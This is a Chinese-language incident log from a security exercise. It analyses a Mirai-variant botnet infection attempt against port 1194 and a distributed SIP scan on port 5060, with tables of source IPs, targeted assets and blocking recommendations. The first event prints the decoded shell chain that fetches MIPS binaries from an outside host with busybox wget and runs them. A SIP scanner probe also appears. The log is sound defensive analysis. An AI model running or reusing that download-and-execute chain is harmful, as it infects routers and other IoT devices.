攻防演练记录¶
实际攻防演练中的告警分析和应急处置记录。
事件一:IoT 僵尸网络扫描投毒¶
时间:2026 年 4 月 14 日 09:55
发现过程:发现资产 IP 114.255.35.139 的 1194 端口(OpenVPN 默认端口)有大量境外 IP 连接:
| 攻击源 IP | 归属地 |
|---|---|
| 193.163.125.154 | 英国 |
| 176.65.148.127 | 荷兰 |
| 185.200.116.79 | 新加坡 |
其中 176.65.148.127 是典型的 IoT 僵尸网络自动化扫描投毒,对 114.255.35.x 逐个 IP 扫描。
载荷分析¶
从 hex 载荷里解出的 shell 命令链:
cd /tmp; rm -rf mp
/bin/busybox wget http://87.121.112.57/dipndots
chmod +x dipndots; ./dipndots frosted.mipsl
/bin/busybox wget http://87.121.112.57/dips
chmod +x dips; ./dips frosted.mips
套路很经典 — 往 /tmp 下载 MIPS 架构的恶意二进制文件,给执行权限然后跑起来。这是 Mirai 变种僵尸网络 的标准传播方式,专门打 Realtek 芯片的路由器、摄像头、NAS 等 IoT 设备。
处置¶
已封禁 176.65.148.127,同时把恶意下载源 87.121.112.57 也加入黑名单。
事件二:SIP 协议分布式扫描¶
时间:2026 年 4 月 15 日 02:07 ~ 07:50
概况:态势感知平台检测到大量外部扫描告警,主要是针对 SIP 协议(5060 端口) 的 Nmap 探测,同时有少量工控协议(44818 端口)漏洞利用尝试和 Web 服务探测。
攻击源 IP 汇总¶
SIP 扫描源(目标端口 5060)¶
| 攻击源 IP | 归属地 | 首次告警 | 次数 |
|---|---|---|---|
| 123.160.221.143 | 河南郑州(联通) | 07:03 | 2 |
| 123.160.221.140 | 河南郑州(联通) | 06:23 | 1 |
| 111.7.96.151 | 河南(移动) | 07:32 | 1 |
| 111.7.96.149 | 河南(移动) | 02:07 | 1 |
| 221.0.13.170 | 山东(联通) | 06:34 | 1 |
| 139.212.71.77 | 韩国 | 06:27 | 1 |
| 103.149.27.168 | 东南亚 | 05:37 | 1 |
| 91.231.89.94 | 东欧(乌克兰段) | 04:06 | 1 |
| 91.230.168.222 | 东欧(乌克兰段) | 04:05 | 1 |
工控协议漏洞利用源(目标端口 44818)¶
| 攻击源 IP | 归属地 | 告警时间 | 威胁 | 等级 |
|---|---|---|---|---|
| 106.38.122.18 | 北京(联通) | 06:35 | Rockwell Automation 拒绝服务(CVE-2017-7924) | 高危 |
| 114.255.35.135 | 北京(联通) | 06:27 | Rockwell Automation 拒绝服务(CVE-2017-7924) | 高危 |
Web 服务探测源(目标端口 441)¶
| 攻击源 IP | 归属地 | 告警时间 | 结果 |
|---|---|---|---|
| 147.185.133.77 | 美国 | 02:14 | 失败 |
被扫描资产¶
SIP 端口(5060)¶
| 目标 IP | 扫描来源数 | 备注 |
|---|---|---|
| 114.255.35.134 | 4 | 被扫最多,重点关注 |
| 114.255.35.129 | 1 | — |
| 114.255.35.130 | 1 | — |
| 114.255.35.135 | 1 | — |
| 114.255.35.138 | 1 | — |
| 106.38.122.18 | 1 | 同时也是 44818 告警的攻击源 |
工控端口(44818)¶
| 目标 IP | 备注 |
|---|---|
| 106.4.161.108 | 需确认是否有工控设备 |
| 123.178.210.195 | 未分配资产组 |
Web 端口(441)¶
| 目标 IP | 备注 |
|---|---|
| 10.0.6.250 | 内网地址,存在信息泄露风险 |
载荷特征¶
OPTIONS sip:nm SIP/2.0
Via: SIP/2.0/UDP
From: <sip:nm@nm>;tag=root
To: <sip:nm2@nm2>
Call-ID: 50000
CSeq: 42 OPTIONS
Max-Forwards: 70
Content-Length: 0
Contact: <sip:nm@nm>
Accept: application/sdp
- 载荷 271 字节,扫描工具指纹疑似 SIPVicious 或同类 SIP 扫描器
- 攻击意图:探测公网暴露的 VoIP/SIP 服务,为后续话费盗刷或语音钓鱼做准备
关联性判断¶
判定为 同一攻击组织/僵尸网络 的依据:
- 所有 Nmap 告警均精准指向 5060 端口,无其他端口探测
- 载荷内容完全一致(相同 CSeq、URI、Call-ID)
- 攻击时间集中在 5 小时窗口内(02:07 ~ 07:50)
- 河南段 IP 出现相邻地址(140/143、149/151),符合代理池轮换特征
处置建议¶
| 优先级 | 措施 |
|---|---|
| 高 | 批量封禁上述 9 个 SIP 扫描源 IP |
| 高 | 封禁 CVE-2017-7924 攻击源(106.38.122.18、114.255.35.135) |
| 高 | 确认 114.255.35.x 段 5060 端口开放情况,无 SIP 业务需求就关闭入站 |
| 高 | 确认 106.4.161.108、123.178.210.195 是否存在工控设备 |
| 中 | 封禁 Web 探测源 147.185.133.77 |
| 中 | 确认 10.0.6.250:441 服务用途,评估信息泄露风险 |
| 中 | 持续监控被扫资产后续告警 |
| 低 | 将扫描源 IP 段加入威胁情报库 |
注意事项¶
114.255.35.135同时出现在被扫资产和 44818 攻击源中,需重点排查安全状态106.38.122.18同样双重身份,情况类似- "企图"表示攻击未触达服务,"失败"表示连接建立但攻击没成功